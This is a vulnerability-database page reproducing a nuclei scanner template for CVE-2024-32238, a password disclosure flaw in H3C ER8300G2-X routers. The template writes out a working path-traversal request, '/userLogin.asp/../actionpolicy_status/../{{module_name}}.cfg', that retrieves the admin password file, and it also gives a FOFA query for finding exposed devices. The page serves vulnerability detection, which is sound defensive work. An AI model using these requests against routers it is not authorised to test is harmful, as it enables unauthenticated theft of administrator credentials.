Lucene search
K

H3C ER8300G2-X - Password Disclosure

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 150 Views

H3C ER8300G2-X - Password Disclosure, Incorrect Access Control, Router's Management Syste

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
H3C ER8300G2-X 安全漏洞
22 Apr 202400:00
cnnvd
CVE
CVE-2024-32238
22 Apr 202400:00
cve
Cvelist
CVE-2024-32238
22 Apr 202400:00
cvelist
NVD
CVE-2024-32238
22 Apr 202420:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
Positive Technologies
PT-2024-24469 · H3C · H3C Er8300G2-X
22 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-32238
23 May 202508:36
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-32238
27 Feb 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-32238
22 Apr 202400:00
vulnrichment
id: CVE-2024-32238

info:
  name: H3C ER8300G2-X - Password Disclosure
  author: s4e-io,adeljck
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  impact: |
    Unauthenticated attackers can access the router's administrative password via the management system interface.
  remediation: |
    Update H3C ER8300G2-X router firmware to a version that addresses the password disclosure vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/20142995/nuclei-templates
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.53229
    epss-percentile: 0.98853
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="icg_helpScript.js"
  tags: cve,cve2024,h3c,router,info-leak,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /userLogin.asp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: module_name
        part: body
        internal: true
        group: 1
        regex:
          - "<title>([A-Za-z0-9-]+)系统管理</title>"

  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "application/x-unknown")'
          - 'contains_all(body, "admpwd=", "auxauthmode=")'
          - 'contains(server, "H3C-Miniware")'
        condition: and
# digest: 4b0a00483046022100db6e2955fa13e7d3f1ce5d652b7fa7387056f165a07f300ca8ea24362f693066022100c522fc0a8904b289f624f1316fb9372c07a25741d6f631d1662aa92a09f2b7b8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.53229
SSVC
150